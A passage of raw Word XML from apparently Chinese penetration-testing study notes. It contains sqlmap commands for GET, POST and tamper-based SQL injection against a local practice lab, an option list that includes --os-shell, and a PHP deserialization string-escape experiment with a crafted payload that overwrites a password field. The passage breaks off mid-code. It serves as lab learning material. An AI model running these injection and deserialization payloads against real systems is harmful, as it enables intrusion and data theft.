    </w:p>
    <w:p w14:paraId="34CD62E8" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46581C66" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>--os-cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D463EC9" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>--os-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE374AB" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12FFA12F" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--threads=3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，最大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D7527A" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--smart </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有大量检测目标时候，只选择基于错误的检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DDF8A1" w14:textId="7AE6C0D6" w:rsidR="0088001C" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--batch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>批处理，在检测过程中会问用户一些问题，使用这个参数统统使用默认值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58980B95" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C013DD3" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36ADBAAB" w14:textId="52E2CD27" w:rsidR="0088001C" w:rsidRDefault="003F7EBD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F194C47" w14:textId="4C67B716" w:rsidR="003F7EBD" w:rsidRPr="003F7EBD" w:rsidRDefault="003F7EBD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003F7EBD">
        <w:t>sqlmap.py  -u http://192.168.0.100:40001/Less-1/?id=3 --cookie "" --random-agent  --proxy="http://127.0.0.1:8080" -v 3 –dbms "MySQL" –technique U -p "id"  --no-cast -D "security" -T "users" --columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711A54F4" w14:textId="77777777" w:rsidR="003F7EBD" w:rsidRDefault="003F7EBD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E337730" w14:textId="77777777" w:rsidR="003F7EBD" w:rsidRDefault="003F7EBD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D77CDF" w14:textId="77777777" w:rsidR="003F7EBD" w:rsidRDefault="003F7EBD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AFF0D54" w14:textId="088C1ABD" w:rsidR="003F7EBD" w:rsidRDefault="003F7EBD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494BB7C8" w14:textId="35FCA35B" w:rsidR="003F7EBD" w:rsidRPr="003F7EBD" w:rsidRDefault="003F7EBD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003F7EBD">
        <w:t>python3 sqlmap.py -r C:\Users\ranja\Downloads\post_100.txt –dbms "mysql" -technique U -p "uname" --proxy="http://127.0.0.1:8080" --dbs --no-cast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DF04FE" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23CF5A12" w14:textId="487826F5" w:rsidR="0088001C" w:rsidRDefault="003F7EBD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tamper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BF1730" w14:textId="5B9C20B6" w:rsidR="0088001C" w:rsidRDefault="003F7EBD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003F7EBD">
        <w:t>python3 sqlmap.py -u http://192.168.0.100:40001/Less-1/?id=1 --cookie "" --random-agent --proxy="http://127.0.0.1:8080" -v 3–dbms "MySQL" –technique U -p id --tamper space2morecomment  -D mysql -T ndb_binlog_index --columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E9848D" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="468ECF38" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="729722DB" w14:textId="77777777" w:rsidR="00002710" w:rsidRPr="0088001C" w:rsidRDefault="00002710" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EBBD613" w14:textId="77777777" w:rsidR="00002710" w:rsidRDefault="00002710" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7913EDA7" w14:textId="77777777" w:rsidR="00AE011D" w:rsidRDefault="00AE011D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2446A4FA" w14:textId="7D73E2C5" w:rsidR="00346C07" w:rsidRDefault="00EC153D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc159779479"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码审计</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="694286AF" w14:textId="77777777" w:rsidR="002A4B4C" w:rsidRDefault="002A4B4C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04D34872" w14:textId="048B155F" w:rsidR="002A4B4C" w:rsidRDefault="002A4B4C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc159779480"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="16AE4D23" w14:textId="77777777" w:rsidR="002A4B4C" w:rsidRDefault="002A4B4C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DFBA8A9" w14:textId="77777777" w:rsidR="002A4B4C" w:rsidRPr="002A4B4C" w:rsidRDefault="002A4B4C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F99828A" w14:textId="78AA00DC" w:rsidR="002A4B4C" w:rsidRDefault="002A4B4C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反序列化字符串逃逸</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63993217" w14:textId="77777777" w:rsidR="002A4B4C" w:rsidRDefault="002A4B4C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B56D5D6" w14:textId="6F06EEF9" w:rsidR="002A4B4C" w:rsidRDefault="009665BE" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>少变多</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6930E95F" w14:textId="77777777" w:rsidR="00F5193C" w:rsidRDefault="00F5193C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F3EA1CA" w14:textId="224ECD7D" w:rsidR="0025472C" w:rsidRDefault="00F5193C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>实验代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A743AC" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DBF9DF" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>少变多题目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600DB86D" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>function filter($str){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09691454" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return str_replace('bb', 'ccc', $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3D8F1E" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A83902" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B9FC3AA" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class A{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B22249B" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public $name='aaaa';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E30B99" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public $pass='123456';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C40DCC0" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F61885F" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB95716" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造顺序，从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`";s:4:"pass";s:6:"hacker";}";s:4:"pass";s:6:"123456";}";s:4:"pass";s:6:"123456";}`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始计算</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104ED823" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得知</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>少变多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> bb-&gt;ccc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，被篡改的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>长度要大，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容要小，才能顶出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC674FB" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`";s:4:"pass";s:6:"hacker";}`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>长度字符，则需要顶出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478298D9" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>顶出长度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变长位数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被替换字符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的个数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782EAA99" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>故输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"bb"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3153B3C2" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7323DCD6" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// ";s:4:"pass";s:6:"hacker";}     len:27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DBE2E5" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// 2-&gt;3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>差值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1   27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4D6D" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$payload = 'O:1:"A":2:{s:4:"name";s:81:"bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb";s:4:"pass";s:6:"hacker";}";s:4:"pass";s:2:"21";}';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26530718" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo $payload;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A43FBE8" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D23EB76" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$payload=filter($payload);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660D1B8E" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo $payload;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE70302" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6B3731" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38316057" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$o=unserialize($payload);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5949C817" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// echo $o-&gt;pass;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8DF610" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo serialize($o);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2725D09B" w14:textId="77777777" w:rsidR="008C0D60" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EAEBD53" w14:textId="70C08978" w:rsidR="0025472C" w:rsidRDefault="008C0D60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D2A8FC" w14:textId="66532263" w:rsidR="009665BE" w:rsidRDefault="00F5193C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555DEC49" w14:textId="77777777" w:rsidR="00F5193C" w:rsidRDefault="00F5193C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44AC6726" w14:textId="0899D7DA" w:rsidR="00F86AC4" w:rsidRDefault="00F86AC4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成一个看起来正常的序列化字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352B3BC4" w14:textId="77777777" w:rsidR="00F86AC4" w:rsidRPr="00F77459" w:rsidRDefault="00F86AC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77459">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A0A3C5" w14:textId="77777777" w:rsidR="00F86AC4" w:rsidRPr="00F77459" w:rsidRDefault="00F86AC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77459">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>// exp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB7A70A" w14:textId="77777777" w:rsidR="00F86AC4" w:rsidRPr="00F77459" w:rsidRDefault="00F86AC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F9008BD" w14:textId="77777777" w:rsidR="00F86AC4" w:rsidRPr="00F77459" w:rsidRDefault="00F86AC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77459">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>class A{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AC4042" w14:textId="77777777" w:rsidR="00F86AC4" w:rsidRPr="00F77459" w:rsidRDefault="00F86AC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
